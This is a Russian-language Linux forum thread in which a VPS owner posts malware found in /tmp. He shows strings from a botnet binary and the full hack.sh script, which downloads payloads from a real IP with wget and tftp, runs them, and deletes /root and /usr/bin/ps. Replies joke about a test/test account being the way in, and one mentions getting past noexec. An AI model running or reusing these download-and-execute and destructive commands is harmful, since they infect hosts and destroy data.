LINUX.ORG.RU
ФорумAdmin

Что это за гадость на моей VPS

 , , , ,


1

4
server:~# ls /tmp
?  bb  busybox	dd  ll	mm  oo


cat /tmp/busybox
<бинарный файл>
>%$#%d.%d.%d.%d%d.%d.%d.0ogin:
assword:ncorrectsh
cd /tmp || cd /var/run;rm -f *;busybox wget http://69.30.225.250/hack.sh;sh hack.sh;busybox rm -rf hack.sh;busybox tftp -r tftp.sh -g 69.30.225.250;sh tftp.sh; rm -rf tftp.sh
/bin/busybox;echo -e '\147\141\171\146\147\164'
gayfgtulti-callREPORT %s:%s:%sREPORT %s:%s:
<бинарный файл>

server:~# wget http://69.30.225.250/hack.sh -O-
--2015-10-18 21:59:14--  http://69.30.225.250/hack.sh
Подключение к 69.30.225.250:80... соединение установлено.
HTTP-запрос отправлен. Ожидание ответа... 200 OK
Длина: 1548 (1,5K) [text/x-sh]
Сохранение в каталог: ««STDOUT»».

 0% [                                                                                                                                                                                                    ] 0           --.-K/s              #!/bin/bash
busybox rm -rf /tmp/*
busybox rm -rf /root/*
busybox rm -rf /usr/bin/strings
busybox rm -fr /usr/bin/ps
cd /tmp; busybox wget http://69.30.225.250/bb; busybox chmod +x bb; ./bb; busybox rm -f bb*
cd /tmp; busybox wget http://69.30.225.250/dd; busybox chmod +x dd; ./dd; busybox rm -f dd*
cd /tmp; busybox wget http://69.30.225.250/oo; busybox chmod +x oo; ./oo; busybox rm -f oo*
cd /tmp; busybox wget http://69.30.225.250/ll; busybox chmod +x ll; ./ll; busybox rm -f ll*
cd /tmp; busybox wget http://69.30.225.250/mm; busybox chmod +x mm; ./mm; busybox rm -f mm*
cd /tmp; busybox wget http://69.30.225.250/bb; busybox cp /bin/busybox ./; busybox cat bb > busybox; busybox rm -f bb; busybox cp busybox bb; busybox rm -f busybox; ./bb; busybox rm -f bb*
cd /tmp; busybox wget http://69.30.225.250/dd; busybox cp /bin/busybox ./; busybox cat dd > busybox; busybox rm -f dd; busybox cp busybox dd; busybox rm -f busybox; ./dd; busybox rm -f dd*
cd /tmp; busybox wget http://69.30.225.250/oo; busybox cp /bin/busybox ./; busybox cat oo > busybox; busybox rm -f oo; busybox cp busybox oo; busybox rm -f busybox; ./oo; busybox rm -f oo*
cd /tmp; busybox wget http://69.30.225.250/ll; busybox cp /bin/busybox ./; busybox cat ll > busybox; busybox rm -f ll; busybox cp busybox ll; busybox rm -f busybox; ./ll; busybox rm -f ll*
cd /tmp; busybox wget http://69.30.225.250/mm; busybox cp /bin/busybox ./; busybox cat mm > busybox; busybox rm -f mm; busybox cp busybox mm; busybox rm -f busybox; ./mm; busybox rm -f mm*
rm -f bin*
100%[===================================================================================================================================================================================================>] 1 548       --.-K/s   за 0s      

2015-10-18 21:59:14 (81,9 MB/s) - written to stdout [1548/1548]

server:~# 


Понятно, что опять взломали

★★★★★

Что это за гадость на моей VPS

Понятно, что опять взломали

А что ты хочешь от нас услышать?

generator ★★★
()

Поздравляю, у тебя прекрасный повод проверить состояние бэкапов, а заодно провести аудит паролей и сервисов, что там крутятся.

x3al ★★★★★
()
Ответ на: комментарий от ne-vlezay

Нет, сейчас ты его ресетапнешь, если не идиот. Потом поставишь апдейты, проведёшь базовую настройку системы, и только потом будешь пилить сурикату.

leave ★★★★★
()

ох-ох

легко говорирть «проверь на руткиты», а как это сделать?

ты уверен, что у тебя в системе не сидит руткит, а? а чем докажешь?

anonymous
()
Ответ на: комментарий от x3al

Итак, мной аудит проведён. Результат: аккаунт test с паролем test. Я его давно не использовал, и не знал что кто-то сможет ещё его использовать

ne-vlezay ★★★★★
() автор топика
Ответ на: комментарий от ne-vlezay

Результат: аккаунт test с паролем test. Я его давно не использовал, и не знал что кто-то сможет ещё его использовать

Вот это анекдот. Я то думал, что так что-то сломать уже с середины 90-х нельзя, все учЁные. А вот поди-ж ты.

no-such-file ★★★★★
()
Ответ на: комментарий от ne-vlezay

аккаунт test с паролем test
Я его давно не использовал
не знал что кто-то сможет ещё его использовать

Этапять. Каждое следующее предложение лучше предыдущего. Что ж ты делаешь изверг, у меня только понедельник начался а я уже ржу как будто пятница случилась.

Pinkbyte ★★★★★
()
Ответ на: комментарий от ne-vlezay

Итак, мной аудит проведён. Результат: аккаунт test с паролем test. Я его давно не использовал, и не знал что кто-то сможет ещё его использовать

на главную повесьте или в галлерею.

kep
()
Ответ на: комментарий от ne-vlezay

Результат: аккаунт test с паролем test. Я его давно не использовал, и не знал что кто-то сможет ещё его использовать

«Я разделась и встала раком в тёмном парке, а через 10 минут почувствовала в себе инородный продолговатый предмет, откуда это?»

anonymous
()

Для генерации паролей я использую стихи репрессированных поэтов 30-х годов в определенном порядке. Советуем-с.

int13h ★★★★★
()

rm -fr /usr/bin/ps

Надо бы челу сказать, что лучше фильтровать вывод. Не сразу админ догадается проверить /proc :)

cd /tmp

Тут тоже надо сделать поправку, ибо /tmp в современном интерпрайс монтируется с noexec.

gh0stwizard ★★★★★
()
Последнее исправление: gh0stwizard (всего исправлений: 1)
Ответ на: комментарий от ashot

при чем тут политика? советую ознакомиться с культурой 30-х - 40-х в СССР - много хорошего есть, правда, уже забытого

int13h ★★★★★
()
Последнее исправление: int13h (всего исправлений: 1)
Ответ на: комментарий от ashot

каким образом поэзия относится к политике, ебанько?

anonymous
()
Ответ на: комментарий от gh0stwizard

ибо /tmp в современном интерпрайс монтируется с noexec.

Бестолку. Скрипты из темп вызываются интерпретатором.

roman77 ★★★★★
()
Ответ на: комментарий от gh0stwizard

Разные бывают. В основном на noexec всем плевать.

roman77 ★★★★★
()
Ответ на: комментарий от omnomnomnus

кстати говоря, бинарники можно запускать и без exec привилегий, как-то так:

$ /lib/ld-linux.so.2 /bin/ls
/bin/ls: error while loading shared libraries: /bin/ls: wrong ELF class: ELFCLASS64

чяднт?

reprimand ★★★★★
()
Последнее исправление: reprimand (всего исправлений: 1)

это же stdout^W детский сад

anonymous
()
Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.